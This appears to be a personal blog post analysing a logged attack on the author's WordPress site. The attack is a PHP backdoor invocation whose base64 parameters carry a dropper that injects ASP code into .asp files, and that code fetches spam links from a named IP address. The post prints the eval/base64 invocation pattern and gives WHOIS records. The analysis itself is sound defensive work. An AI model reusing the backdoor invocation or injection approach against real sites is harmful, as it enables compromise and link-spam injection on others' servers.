Invocation of a PHP backdoor, code sent injects Microsoft ASP code into files with ".asp" suffix file names.
The injected code itself puts 385 HTML hyperlinks into the output of the original ASP file. Those 385 hyperlinks might be an SEO campaign, they might be crappy advertising, or they might be the entrance into an online shopping experience hosted solely on machines hosting compromised WordPress sites.
inetnum: 39.128.0.0 - 39.191.255.255
netname: CMNET
descr: China Mobile Communications Corporation
descr: Mobile Communications Network Operator in China
descr: Internet Service Provider in China
country: CN
Looks like the attackers sought to use some kind of backdoor. They thought the backdoor code was in the file for the URL http://stratigery.com/wp-content/themes/twentytwelve/footer.php That's pretty clearly a WordPress theme-related PHP file.
The download included 4 HTTP POST parameters, Izv0k, z0, z2 and z9.
The Izv0k parameter is apparently PHP code to be eval'ed by the backdoor
@eval(${'_POST'}z9
Since parameter z9 had the value "BaSE64_dEcOdE", that would base64-decode the string
in the HTTP parameter z0, and immediately evaluate it.
There's an extra eval in there, I think.
That is, the Izv0k parameter could have a value of:
${'_POST'}[z9](${'_POST'}[z0])
and it would work identically.
The only deobfuscating to be done is a few base64 -d
invocations.
The base64-encoded string in HTTP parameter z0
is a dropper.
It appears to start at PHP's DOCUMENT_ROOT
(probably the same as Apache web server's DocumentRoot),
work it's way down the directory tree,
and inject some Microsoft ASP code into every file
whose name has a ".asp" extension.
It's a depth-first search, so it holds a lot of directories open via PHP's readdir().
The ASP code is carried in the z2 HTTP parameter,
and it's base64-encoded.
The dropper creates Linux-style paths during its search for ".asp" files, which is really odd. I'm not sure I understand why you'd do that, and not use Windows-style paths. It's very unlikely that a Linux server would have the ability to run ASP files.
I'm not a denizen of the "Microsoft Ecosystem",
so I don't really understand the ASP code.
It looks like it retrieves http://43.251.102.43/cx/cx/link/
using CreateObject("Microsoft.XMLHTTP"),
then writes out the bytes it retrieves.
The bytes retrieved appear to be nothing more
than 385 HTML links to other PHP web pages.
I can't get the link's text to decode - it's some non-ASCII
encoding, maybe Unicode of some sort.
I downloaded one of the links, http://www.michaelmurphy.com/portraits/quanmengyao.php.
Looks like some kind of on-line catalog.
Some of the web sites linked-to by the 385 original HTML links
also appear in quanmengyao.php,
like http://www.milon.ru/imagessmall/juzhimu.php
My guess is that these 385 HTML links get you into a whole on-line store whose pages are involuntarily hosted on a world-wide assortment of compromised web sites.
This is the IP address that the ASP code downloads from.
inetnum: 43.251.100.0 - 43.251.103.255
netname: BSYNTCL-CN
descr: Room 744, No.80 Hu Lang Road
descr: Tong Zhou Qu Lu Cheng Zhen
descr: Beijing, PRC
country: CN
role: Beijing Shijihulian Yuntong Network Technology Co
address: Room 744, No.80 Hu Lang Road, Tong Zhou Qu Lu Cheng Zhen, Beijing, PRC, Beijing Tong Zhou Qu Lu Chen
country: CN
Nothing to see here. I find Chinese ISPs to be particularly opaque.